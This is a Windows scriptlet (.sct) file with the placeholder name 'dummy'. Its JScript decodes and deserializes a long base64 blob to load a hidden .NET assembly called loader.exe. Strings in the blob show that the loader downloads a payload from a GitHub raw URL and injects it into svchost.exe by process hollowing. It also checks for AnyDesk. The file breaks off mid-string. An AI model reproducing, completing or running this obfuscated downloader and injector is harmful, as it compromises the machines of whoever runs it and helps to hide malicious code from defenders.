<?xml version="1.0" encoding="utf-8"?>
<package>
  <component
    id="dummy">
    <registration
      description="dummy"
      progid="dummy"
      version="1.00"
      remotable="True">
      <script
        language="JScript"><![CDATA[function setversion() {
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
}
function debug(s) {}
function base64ToStream(b) {
	var enc = new ActiveXObject("System.Text.ASCIIEncoding");
	var length = enc.GetByteCount_2(b);
	var ba = enc.GetBytes_4(b);
	var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
	ba = transform.TransformFinalBlock(ba, 0, length);
	var ms = new ActiveXObject("System.IO.MemoryStream");
	ms.Write(ba, 0, (length / 4) * 3);
	ms.Position = 0;
	return ms;
}

var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAu"+
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
"SG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVy"+
"ZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAA"+
"CQYAAAAJCQAAAAYRAAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0"+
"W10pBhIAAAAsU3lzdGVtLk9iamVjdCBEeW5hbWljSW52b2tlKFN5c3RlbS5PYmplY3RbXSkIAAAA"+
"CgELAAAAAgAAAAYTAAAAIFN5c3RlbS5YbWwuU2NoZW1hLlhtbFZhbHVlR2V0dGVyBhQAAABNU3lz"+
"dGVtLlhtbCwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2Vu"+
"PWI3N2E1YzU2MTkzNGUwODkGFQAAAAd0YXJnZXQwCQYAAAAGFwAAABpTeXN0ZW0uUmVmbGVjdGlv"+
"bi5Bc3NlbWJseQYYAAAABExvYWQKDwwAAAAAMgAAAk1akAADAAAABAAAAP//AAC4AAAAAAAAAEAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAOH7oOALQJzSG4AUzNIVRoaXMg"+
"cHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQAAAAAAAAAUEUAAGSGAgCW5PC1"+
"AAAAAAAAAADwACIACwIwAAAgAAAAEAAAAAAAAAAAAAAAIAAAAAAAQAEAAAAAIAAAAAIAAAQAAAAA"+
"AAAABgAAAAAAAAAAYAAAAAIAAAAAAAADAGCFAABAAAAAAAAAQAAAAAAAAAAAEAAAAAAAACAAAAAA"+
"AAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAA7A8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"ACg+AAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAIAAASAAAAAAAAAAAAAAALnRleHQAAAC+HgAAACAAAAAgAAAAAgAAAAAAAAAAAAAA"+
"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"+
"AAAIAAAAAgAAAAUAAAAIAAAAAQAAAAQAAAAEAAAACgAAAAAA7wMBAAAAAAAGAKwD6gUGAMwD6gUG"+
"ABsDuAUPAAoGAAAGAHsDIQQGAMUGuAQGAC8DywUGAIcF6gUGAMwCuAQGAEMD6gUGAF4DuAUGAE8E"+
"bgYGAEgAbgYGAAAD6gUGAHsC6gUGAGgA6gUKAPABHAUGAP8EuAQGAE8A6gUKAPwGHAUGAJQDuAUG"+
"AD8F6gUGAG0EywUGAOoDuAQGADsEuAQGAMoHGAEGALEFuAQGAGUFuAQGAIYHuAQGAJ4FuAQOAJ4G"+
"uAUSAAQCLAUGADoALwEOAHMF3QYOAKsC3QYKACsHHAUGAA8CuAQAAAAACAEAAAAAAQABAIEBEAAM"+
"BCsBGQABAAEAAQAQAIUGKwEZAAEADAAAABAAsAQrARkAAQAOAAMBEADfAAAAGQABABUAAwEQAAEA"+
"AAAZAAoAGAADARAAJAAAABkADQAbAAMBEACaAAAAGQAQAB4ABgD1AgsCBgBWBQ4CBgCsBBYCAQAX"+
"ABkCAQCLAB0CAQC7AB0CAQD3ACECAQAzACUCAQC0AC0CBgD1AgsCBgBWBTUCAQAzADkCBgD1AgsC"+
"BgBWBTUCAQAzADkCBgD1AgsCBgBWBTUCBgChBBYCBgBCBBYCBgBpBhYCAQAMACECAQCtACECAQAz"+
"AC0CAAAAAIAAkSCPBj0CAQAAAAAAgACRIHcHTQILAAAAAACAAJEgmgdWAhAAAAAAAIAAkSDnBGAC"+
"FQAAAAAAgACRIFwHZgIXAAAAAACAAJEgSwdmAhkAAAAAAIAAkSCQAWwCGwAAAAAAgACRIBsCcQIc"+
"AEggAAAAAJYApQF2Ah0AaCIAAAAAkQDHBH4CIACYIgAAAACRAOUChAIiALwiAAAAAIYYqwUGACQA"+
"yCIAAAAAhgDMBooCJAD8IgAAAACRAM0EkAImADwjAAAAAJMAaQGQAiYAfCMAAAAAkwBcAZUCJgDQ"+
"IwAAAACRABAEWAApAPAjAAAAAJEASgGdAioANCQAAAAAhhirBQYAKwBAJAAAAACRCBEBpwIrAF8k"+
"AAAAAIYYqwUGACsAaCQAAAAA4QFCBwYAKwA0JgAAAADhAY4CIAArADYmAAAAAIYYqwUGACwAQCYA"+
"AAAA4QFCBwYALAD4JgAAAADhAY4CIAAsAPomAAAAAIYYqwUGAC0ABCcAAAAA4QFCBwYALQDMJwAA"+
"AADhAY4CIAAtAM4nAAAAAIYYqwUGAC4A2CcAAAAA4QFCBwYALgAAKQAAAADhAY4CIAAuAAAAAQA8"+
"AgAAAgBtAgAAAwA8BgAABAApBgAABQAZBgAABgBZBgAABwARBwAACACtBwAACQAJBQAACgDSBAAA"+
"AQCdBgAAAgC0BgAAAwAABAAABADAAgAABQDTBgAAAQCdBgAAAgCmBgAAAwBjBQAABAD6AwAABQC/"+
"BAAAAQAnAgAAAgCoBgAAAQCdAQAAAgBtBwAAAQCdAQAAAgBtBwAAAQCdAQAAAQA1AgAAAQBsBQAA"+
"AgA9BwAAAwBpBgAAAQDRAQAAAgAHBwAAAQAHBAAAAgAHBwAAAQChBAAAAgBCBAAAAQChBAAAAgBC"+
"BAAAAwBpBgAAAQBOAgAAAQCsBAAAAQCeAgAAAQCeAgAAAQCeAgAAAQCeAgUAPQAGAD0ABwA9AAgA"+
"PQAJAKsFAQARAKsFBgAZAKsFCgApAKsFEAA5AKsFFQBRAKsFGgBZAKsFBgBxAKsFBgB5AEIHBgB5"+
"AI4CIACpAKsFBgC5AHYARgC5AP4ATAC5AMIAUgDJANQHWADJAL4GXQDRAMAHZAC5AIAAaADZABcF"+
"bwDhAJAHcgDxAFAGfQC5AMIAgwC5AMwAiQC5AGEEkADZANcAmwDZAKsFnwC5AFQEqQAxAKsFBgBh"+
"AJMFswBBAOgGBgCxAO4CvQCxADcHwgCxAEsEzwD5AFoC7AABAYwH8wAMAO4CEAEMADcHwgAMAEsE"+
"HgERAYwEPQGhAKsFBgChAHIBRAEUAJMFVQEcAMEBZQEMAKoBaQEcAOgGfwGJANgBhAGJAB8HiQEh"+
"AXsBjwEkAJMFVQEsAMEBZQEsAOgGfwEpAd0CBgAMAPwEsQEMAPIGtwFBAMEBZQGxAKoBaQGxAPwE"+
"sQGxAPIGBgAuAAsAqwIuABMAtAIuABsA0wIuACMA3AJjACsAtAOjAEMAQgPDAEMAQgPjAEMAQgMD"+
"AUMAQgPAATMAJgPAATsAQgPgATMARwPgATsAQgMAAjMAZwMAAjsAQgNAAjMAiwNAAjsAQgOAAjsA"+
"QgPgAlsAQgNAA1sAQgOgA1sAQgMABFsAQgMmAJUApACuALgA1ADeAOgABAEnAb0BzgHfAQUALAAT"+
"AAUALgAVAAYAMgATAAYANAAVAAcAOAATAAcAOgAVAAgAPgATAAgAQAAVAHUEggQJAU4BXgGYAZ8B"+
"AAEDAI8GAQAAAQUAdwcBAAABBwCaBwEAAAEJAOcEAgAAAQsAXAcBAAABDQBLBwEAAAEPAJABAQAA"+
"AREAGwIBAASAAAAAAAAAAAAAAAAAAAAAADgFAAAEAAAAAAAAAAAAAAD5ASIBAAAAAAQAAgAAAAAA"+
"AAAAAAICHAUAAAAABAAAAAAAAAAAAAAA+QG4BAAAAAAEAAAAAAAAAAAAAAD5AdECAAAAAAUABAAG"+
"AAQABwAEAAgABABBAMoAQQDZAEEA4wBHAP8ASwAZAVkAdAFZAKYBcQDHAXEA2AFxAO4BAAAAAAA8"+
"TWFpbj5kX18wADxkYXRhPjVfXzEAPGNsaWVudD41X18xADxSdW5Bc3luYz5kX18xADw+dV9fMQBJ"+
"RW51bWVyYWJsZWAxAFRhc2tgMQBBc3luY1Rhc2tNZXRob2RCdWlsZGVyYDEAVGFza0F3YWl0ZXJg"+
"MQBSZWFkSW50MzIAV3JpdGVJbnQzMgA8cmVzcG9uc2U+NV9fMgA8UnVuV2l0aEFzeW5jPmRfXzIA"+
"PD5zX18yADw+dV9fMgA8PnNfXzMAUmVhZEludDY0AFdyaXRlSW50NjQAVG9JbnQ2NAA8RG93bmxv"+
"YWRGaWxlQXN5bmM+ZF9fNAA8PnNfXzQAUmVhZEludDE2ADxNb2R1bGU+ADxNYWluPgBTeXN0ZW0u"+
"SU8AbXNjb3JsaWIAYWJjAFN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljAERvd25sb2FkRmlsZUFz"+
"eW5jAFJ1bldpdGhBc3luYwBSdW5Bc3luYwBHZXRBc3luYwBSZWFkQXNCeXRlQXJyYXlBc3luYwBS"+
"ZXN1bWVUaHJlYWQAaFRocmVhZABMb2FkAEF3YWl0VW5zYWZlT25Db21wbGV0ZWQAZ2V0X0lzQ29t"+
"cGxldGVkAHNvdXJjZQBFbnN1cmVTdWNjZXNzU3RhdHVzQ29kZQBIdHRwUmVzcG9uc2VNZXNzYWdl"+
"AEVudW1lcmFibGUASURpc3Bvc2FibGUAQ2xvc2VIYW5kbGUAUHJvY2Vzc0hhbmRsZQBoYW5kbGUA"+
"bHBBcHBsaWNhdGlvbk5hbWUAcHJvY2Vzc05hbWUAR2V0UHJvY2Vzc2VzQnlOYW1lAGxwQ29tbWFu"+
"ZExpbmUASUFzeW5jU3RhdGVNYWNoaW5lAFNldFN0YXRlTWFjaGluZQBzdGF0ZU1hY2hpbmUAU2Vj"+
"dXJpdHlQcm90b2NvbFR5cGUAZmxBbGxvY2F0aW9uVHlwZQBTeXN0ZW0uQ29yZQBEaXNwb3NlAEFs"+
"bG9jYXRlAENyZWF0ZQA8PjFfX3N0YXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAERlYnVn"+
"Z2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3luY1N0YXRlTWFjaGluZUF0dHJp"+
"YnV0ZQBEZWJ1Z2dlclN0ZXBUaHJvdWdoQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0"+
"ZQBEZWJ1Z2dlckhpZGRlbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRl"+
"AFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAEJ5dGUAbG9hZGVyLmV4ZQBuU2l6ZQBkd1Np"+
"emUAc2l6ZQBkZWYASXNQcm9jZXNzUnVubmluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAFN0"+
"cmluZwBob3N0UGF0aABnZXRfVGFzawBBbGxvY0hHbG9iYWwARnJlZUhHbG9iYWwATWFyc2hhbABr"+
"ZXJuZWwzMi5kbGwAbnRkbGwuZGxsAHNldF9TZWN1cml0eVByb3RvY29sAHBheWxvYWRVcmwAdXJs"+
"AFByb2dyYW0AU3lzdGVtAHdyaXR0ZW4AQWxpZ24ATWFpbgBscFByb2Nlc3NJbmZvcm1hdGlvbgBa"+
"d1VubWFwVmlld09mU2VjdGlvbgBTZXRFeGNlcHRpb24AbHBTdGFydHVwSW5mbwBaZXJvAFN5c3Rl"+
"bS5OZXQuSHR0cABTeXN0ZW0uTGlucQBsb2FkZXIAQXN5bmNUYXNrTWV0aG9kQnVpbGRlcgA8PnRf"+
"X2J1aWxkZXIAbHBCdWZmZXIAYnVmZmVyAFNlcnZpY2VQb2ludE1hbmFnZXIAVGFza0F3YWl0ZXIA"+
"R2V0QXdhaXRlcgBCaXRDb252ZXJ0ZXIALmN0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBT"+
"eXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2"+
"aWNlcwBEZWJ1Z2dpbmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAGxw"+
"UHJvY2Vzc0F0dHJpYnV0ZXMAR2V0Qnl0ZXMAZHdDcmVhdGlvbkZsYWdzAGFyZ3MAU3lzdGVtLlRo"+
"cmVhZGluZy5UYXNrcwBUZXN0Q2xhc3MAQ3JlYXRlUHJvY2VzcwBoUHJvY2VzcwBscEJhc2VBZGRy"+
"ZXNzAGxwQWRkcmVzcwBDb25jYXQAT2JqZWN0AEluamVjdABmbFByb3RlY3QAU3lzdGVtLk5ldABH"+
"ZXRSZXN1bHQAU2V0UmVzdWx0AEh0dHBDbGllbnQAYWxpZ25tZW50AGxwRW52aXJvbm1lbnQAZ2V0"+
"X0NvbnRlbnQASHR0cENvbnRlbnQAU3RhcnQAaG9zdABNb3ZlTmV4dABHZXRUaHJlYWRDb250ZXh0"+
"AFNldFRocmVhZENvbnRleHQAbHBDb250ZXh0AFZpcnR1YWxBbGxvY0V4AEFycmF5AEFueQBCbG9j"+
"a0NvcHkAV3JpdGVQcm9jZXNzTWVtb3J5AGxwQ3VycmVudERpcmVjdG9yeQBHZXRDdXJyZW50RGly"+
"ZWN0b3J5AElzTnVsbE9yRW1wdHkAAAAAAyAAAAEAbWgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUA"+
"YgAuAGMAbwBtAC8AcwBkAGYAcwBlAHIAcwBhAC8AYQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBh"+
"AGQAcwAvAG0AYQBpAG4ALwBsAGkAdABlAAA/QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQA"+
"ZQBtADMAMgBcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAAD0EAbgB5AEQAZQBzAGsAAAAAAOdD/HOI"+
"awpOgMut6OcF6kMABCABAQgDIAABBSABARERBCABAQ4EIAEBAgUgAQESJQUgAQESPR8HGAgICAgG"+
"BgodBR0FGA4OCgodBQoCBh0FCAgIHQUCBQACCBwIBQACBhwIBQACChwIBAABAg4GAAMODg4OAwAA"+
"DgYAAwEYCAgCBhgKAAUBEnUIEnUICAUAAR0FCgUAAgoYCAYAAwEYCAoEAAEBGAUHAwoKGAMgAAoE"+
"IAEBCgQHAhgYBAABGAgEBwERIQQgABEhBAcBEhgEAAARWQcwAQEBEB4ABAoBEhgEIAASMQQHARIc"+
"BAoBEhwEBwESIAQKARIgAwcBAgYAAR0SfQ4LEAEBAhUSgIUBHgAECgESfQQHARIUBhURTQEdBQgA"+
"ABURTQETAAQKARIUCCAAFRI1ARMAFQcGCB0FFRFBARJFEhQVEUEBHQUSSQYAAQERgI0JIAEVEjUB"+
"EkUOBhUSNQESRQggABURQQETAAYVEUEBEkUDIAACCjACAgEQHgAQHgEKCgIVEUEBEkUSFAQgABMA"+
"BCAAEkUFIAASgJEIIAAVEjUBHQUGFRI1AR0FBhURQQEdBQoKAhURQQEdBRIUBSABARJJBSABARMA"+
"CQcECBEhEhgSSQYKAhEhEhgJBwQIESESHBJJBgoCESESHA4HBQgCFRFBAR0FEiASSQoKAhURQQEd"+
"BRIgCLd6XFYZNOCJCLA/X38R1Qo6AgYIBwYVEU0BHQUCBg4DBhJRAwYSRQMGHQUHBhURQQESRQcG"+
"FRFBAR0FAwYRWQMGESEPAAoCDg4YGAIJGA4dBR0FCAAFCgoKCgkJCQAFCgoKHQUICgUAAgkKCgUA"+
"AgIKGAQAAQkKBAABAgoHAAMBHQUODgUAAhgYCAUAAhgICAUgAgEODgQAABIxBwADEjEODg4JAAEV"+
"EjUBHQUOAwAAAQgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQAHAQAA"+
"AABJAQAaLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjgBAFQOFEZyYW1ld29ya0Rpc3BsYXlOYW1l"+
"Ei5ORVQgRnJhbWV3b3JrIDQuOBsBABZhYmMuUHJvZ3JhbSs8TWFpbj5kX18wAAAEAQAAAB8BABph"+
"YmMuUHJvZ3JhbSs8UnVuQXN5bmM+ZF9fMQAAIwEAHmFiYy5Qcm9ncmFtKzxSdW5XaXRoQXN5bmM+"+
"ZF9fMgAAKAEAI2FiYy5Qcm9ncmFtKzxEb3dubG9hZEZpbGVBc3luYz5kX180AAAFAQABAAAAAAAA"+
"AADFngfuAAAAAAIAAABeAAAAYD4AAGAgAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAUlNE"+
"U/3E2/AMIKNKlqgjY2ibX7EBAAAAQzpcVXNlcnNcVXNlclxEb2N1bWVudHNcUHJvZ3JhbW1pbmdc"+
"eHl6IGxvYWRlclxvYmpcUmVsZWFzZVxsb2FkZXIucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAEAAAACAAAIAYAAAAUAAAgAAAAAAAAAAAAAAA"+
"AAAAAQABAAAAOAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAQABAAAA"+
"aAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAA1AIAAJBAAABEAgAAAAAAAAAAAABEAjQAAABWAFMAXwBW"+
"AEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAAAAAAAAAAAAAAAAAAAPwAAAAAA"+
"AAAEAAAAAQAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAE"+
"AAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEpAEAAAEAUwB0AHIAaQBuAGcARgBpAGwA"+
"ZQBJAG4AZgBvAAAAgAEAAAEAMAAwADAAMAAwADQAYgAwAAAALAACAAEARgBpAGwAZQBEAGUAcwBj"+
"AHIAaQBwAHQAaQBvAG4AAAAAACAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADAA"+
"LgAwAC4AMAAuADAAAAA2AAsAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAGwAbwBhAGQAZQBy"+
"AC4AZQB4AGUAAAAAACgAAgABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAACAAAAA+AAsA"+
"AQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAbABvAGEAZABlAHIALgBlAHgAZQAA"+
"AAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAADgA"+
"CAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAA5EIA"+
"AAQNAAAAAAAAAAAAAO+7vzw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+Cjxh"+
